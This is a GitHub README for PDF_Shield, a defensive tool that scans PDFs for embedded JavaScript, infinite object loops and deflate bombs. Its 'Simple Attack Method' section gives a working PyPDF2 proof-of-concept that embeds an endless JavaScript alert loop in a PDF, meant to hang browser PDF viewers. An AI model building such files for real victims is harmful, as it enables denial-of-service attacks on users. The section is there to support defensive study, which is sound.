Skip to content

whiteSHADOW1234/PDF_Shield

Repository files navigation

PDF_Shield Python Version License

Table of Contents

Introduction

PDF Shield is a Python-based tool designed to detect and mitigate potential Denial of Service (DoS) attacks and embedded JavaScript threats within PDF files. By analyzing PDF structures, it helps users identify malicious content that could compromise system security.​

Features

  • Automated PDF Monitoring: Real-time scan of downloaded PDFs for potential DoS or malicious JavaScript.

  • Drag & Drop: Standalone executable supports drag-and-drop scanning on Windows.

  • Customizable Alerts: Pop-up notifications inform of embedded JS, infinite loops, deflate bombs.

  • Extensible: Easily add new detection rules via a modular plugin architecture.

  • User-Friendly Interface: Simple command-line & GUI interface for ease of use.

  • Cross-Browser Defense: Focused on PDF engines in Chrome, Edge, Brave (PDFium-based). However, our detection methods cover most common risks in PDF.js (Firefox) too.

Motivation

PDF attacks, particularly as a method within social engineering attacks, have seen a significant increase in occurrence. Cyber adversaries exploit the flexibility of PDF files, often leveraging JavaScript customization to target unsuspecting users. Despite attempts to address vulnerabilities, built-in PDF reader engines in modern browsers remain vulnerable. To mitigate risks, the PDF DoS Detector aims to reduce the number of victims by alerting users to potential DoS attack methods found within PDF files.

Basic PDF Syntax

  You can gain valuable insights into PDF syntax by watching this informative video titled TROOPERS15 Ange Albertini and Kurt Pfeifle - Mastering Advanced PDF Techniques.

  Here is some crucial information in the video that will help you understand what this project is all about:

  1. A PDF's body section consists of objects, commencing with <number> <generation> obj and concluding with endobj. rJn6sLelp

  2. Here's how object references work: ByuCTUggT

    HklEAUge6

    rJlrCUxx6

    NOTED: Name objects begin with a forward slash (/), and the letter within can be represented in hexadecimal notation!!!

  3. Here's a breakdown of how objects are parsed: SkrzWPlxp

Use real situation as an example

  The information provided above may not be sufficient once we open the embedded.pdf file, which will be generated by following the steps outlined in the "Basic Attack Method" section, using a text editor such as VSCode.

  You will probably observe two occurrences of /JavaScript within the PDF document:

  1. The first occurrence of this can be found within an object like the one below, denoting the moment at which the /JavaScript object will be run.
    ...
    3 0 obj
    <<
    /Type /Catalog
    /Pages 1 0 R
    /Names <<
    /JavaScript <<
    /Names [ (41d4efc4\055d000\05546e4\055a973\0556f92c8bbd0f7) 29 0 R ]
    >>
    >>
    >>
    endobj
    ...
    
  2. The second one will appear prior to the xref section, instructing the PDF to execute the subsequent text as JavaScript code. Here's a more detailed explanation of what it accomplishes.
    ...
    29 0 obj
    <<
    /Type /Action
    /S /JavaScript
    /JS (\012\040\040\040\040app\056alert\050\042Hello\054\040World\041\042\051\073\012)
    >>
    endobj
    xref  <-- This is the beginning of xref part
    ...
    

Attack

Attacker Model

  • Victim opens malicious PDF document
  • Bad things happen (attack-dependent)
  • No user interaction required

Simple Attack Method (PoC)

Take JavaScript embedded attack as example:

  1. Run pip install PyPDF2 in the terminal.

  2. Next, use the .add_js() method of the PyPDF2 library to create a Python script:

    import PyPDF2
    
    def embed_javascript(pdf_file, js_code):
        pdf_reader = PyPDF2.PdfReader(pdf_file)
        pdf_writer = PyPDF2.PdfWriter()
    
        for page in pdf_reader.pages:
            pdf_writer.add_page(page)
        pdf_writer.add_js(js_code)
    
        with open('embedded.pdf', "wb") as f:
            pdf_writer.write(f)
    
    javascript_code = '''
    while(1){
        app.alert("Hello, World!");
    }
    '''
    
    pdf_file_path = 'blank.pdf'
    with open(pdf_file_path, 'rb') as pdf_file:
        embed_javascript(pdf_file, javascript_code)
  3. Please ensure that you run the Python file you've recently generated.

    Don't forget to update the FILE_NAME accordingly!

  4. Open the embedded.pdf file in the listed web browsers to verify that they trigger an alert window, confirming the successful execution of the embedded JavaScript code within the PDF.

    A. Microsoft Edge: S181PIggp

    B. Google Chrome: S1nMdLlg6

    C. Brave: SJ97_IeeT

Defense

Defense Model

  • The user downloads a potentially malicious PDF.
  • The tool conducts an automated scan on the downloaded PDF, presenting the results through a user-friendly pop-up window.
  • The user is empowered to make informed decisions, with options to either eliminate identified vulnerabilities within the PDF or proceed with opening it.

Defense Targets

  • Note: The following chart lists CVE information specifically related to PDFium. While it might apply to other PDF engines, our project focuses on creating a defense tool for current web browsers using PDFium, like Chrome, Brave, and Edge. Examples include CVE-2023-41257 (Foxit Reader 12.1.2.15356), CVE-2023-38573 (Foxit Reader 12.1.2.15356), and CVE-2022-39016 (PDFtron in M-Files Hubshare before 3.3.10.9).

JavaScript Related Attacks

Description Defence Method Related CVEs or Papers
JS runs stored XSS payload Notice user there's JS embedded in the PDF CVE-2023-45207
Remote attackers use JS to cause DOS Notice user there's JS embedded in the PDF CVE-2012-2844
Execute arbitrary JavaScript code with chrome privileges Notice user there's JS embedded in the PDF CVE-2013-5598
XSS created by injected JS Notice user there's JS embedded in the PDF CVE-2007-0045
Infinite loops caused by JavaScripts Notice user there's JS embedded in the PDF CVE-2007-0104
Sharing of objects over calls into JavaScript runtime Notice user there's JS embedded in the PDF CVE-2019-5772
Form Modification caused by JavaScripts Notice user there's JS embedded in the PDF Shadow Attacks: Hiding and Replacing Content in Signed PDFs
  • This project alerts users when it finds JavaScript code for two reasons. Firstly, many attacks are connected to JavaScript, according to Spider Experts. Secondly, creating a responsible PDF doesn't need JavaScript; there are built-in Named Objects that support responsible actions. JavaScript is only necessary if the PDF relies solely on it, for example, detecting keystrokes or playing videos without using YouTube or other online services.

Name Object Infinite Loops

Description Defence Method CVEs
Caused by the Named Object "/Kids" Notice user there's infinite loop in the PDF CVE-2007-0104
Action loop caused by "/Next" Notice user there's infinite loop in the PDF CVE-2007-0104
Object streams may extend other "/ObjStms" Notice user there's infinite loop in the PDF CVE-2007-0104
Outline entries ("/Outlines") can refer to each other Notice user there's infinite loop in the PDF CVE-2007-0104
Incorrect object lifecycle Notice user there's infinite loop in the PDF CVE-2018-18336
Incorrect object lifecycle Notice user there's infinite loop in the PDF CVE-2018-17481

Deflate Bomb

Description Defence Method Related CVEs
Heap buffer overflow Notice user there's a posiblity to have a deflate bomb in the PDF CVE-2020-6513
PDFium does not properly handle certain out-of-memory conditions Notice user there's a posiblity to have a deflate bomb in the PDF CVE-2015-1271

Usage

I. Clone this repo and Automatically scan any downloaded PDF file

  1. git clone this repository and don't forgot to run pip install -r requirements.txt.
  2. Execute the main.py file.
  3. And now download a PDF file.
  4. Sit back, relax, and wait for the scanning process to be completed.

II. Manually drag-and-drop a PDF file for scanning

  1. Download the PDF Shield zipped file located in the output directory.
  2. Unzip it on your device.
  3. Locate the PDF Shield.exe in the unzipped folder and right-click on it to Create a Shortcut on your Desktop.
  4. Drag-and-drop the PDF you want to scan onto the icon.
  5. Sit back, relax, and wait for the scanning process to be completed.

III. Automatically scan any downloaded PDF file

  1. Download the PDF Shield zipped file located in the output directory.
  2. Unzip it on your device.
  3. Double-click the PDF Shield.exe in the unzipped folder to start the scanning program.
  4. Now, download a PDF file.
  5. Sit back, relax, and wait for the scanning process to be completed.

References & Relative News

Contributions

Contributions to the PDF DoS Detector are welcome. Whether it's bug fixes, feature enhancements, or other improvements, feel free to contribute to make the tool more effective in protecting users from PDF-based DoS attacks.

Stay secure, and happy browsing!